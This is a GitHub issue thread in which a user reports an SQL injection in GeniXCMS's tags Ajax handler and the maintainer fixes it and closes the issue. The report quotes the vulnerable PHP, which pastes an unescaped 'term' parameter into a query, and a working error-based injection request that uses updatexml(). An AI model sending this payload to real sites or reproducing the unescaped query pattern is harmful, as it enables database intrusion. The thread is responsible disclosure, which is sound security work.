Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

safety problem #60

Closed
l3m0n opened this issue Jan 6, 2017 · 4 comments
Closed

safety problem #60

l3m0n opened this issue Jan 6, 2017 · 4 comments
Assignees
@semplon
Labels
security

Comments

@l3m0n
Copy link

l3m0n commented Jan 6, 2017

/inc/lib/Control/Ajax/tags-ajax.control.php

if (isset($_GET['token']) && Token::isExist($_GET['token'])) {
    if (User::access(2)) {
        $tags = Db::result(
            "SELECT * FROM `cat` WHERE `type` = 'tag' AND `name` LIKE '".$_GET['term']."%' ORDER BY `name` ASC"
        );

I think you know this.

    public static $group = array(
        '0' => ADMINISTRATOR,
        '1' => SUPERVISOR,
        '2' => EDITOR,
        '3' => AUTHOR,
        '4' => CONTRIBUTOR,
        '5' => VIP_MEMBER,
        '6' => GENERAL_MEMBER, );

but it need editor.

this is my exp:
GET /code-src/GeniXCMS/GeniXCMS-master/?ajax=tags&token=vv4lHNZit2KJUJEIqUKn3S1CRvr5Wb8smp6ir3ujyj7iijC6t0GvfpLgSW0a3xGicHSXTH6IW1BCeUlt&term=a'%20and%20updatexml(1,(select+USER()),1)%23
@semplon semplon self-assigned this Jan 7, 2017
@semplon
Copy link
Collaborator

semplon commented Jan 7, 2017

thank you for reporting this. i'll fix this on the next commit.

@l3m0n
Copy link
Author

l3m0n commented Jan 8, 2017

You're welcome.In fact, I would like to apply for CVE, I do not know this?

@semplon
Copy link
Collaborator

semplon commented Jan 8, 2017

@l3m0n to request CVE please do this step https://cve.mitre.org/cve/request_id.html

semplon pushed a commit that referenced this issue Jan 8, 2017
Add Post Param at Hooks
6e21c01 
Filter Categories for Tags
Change $url position to correct location at Comments.class.php
Add Author Pages
#60 Security Fix Issue
Change Ajax URL Router format
Change Ajax, Mods router scrapper
@semplon
Copy link
Collaborator

semplon commented Jan 8, 2017

this issue fixed

@semplon semplon closed this as completed Jan 8, 2017
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@semplon semplon

Labels
security
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@semplon @l3m0n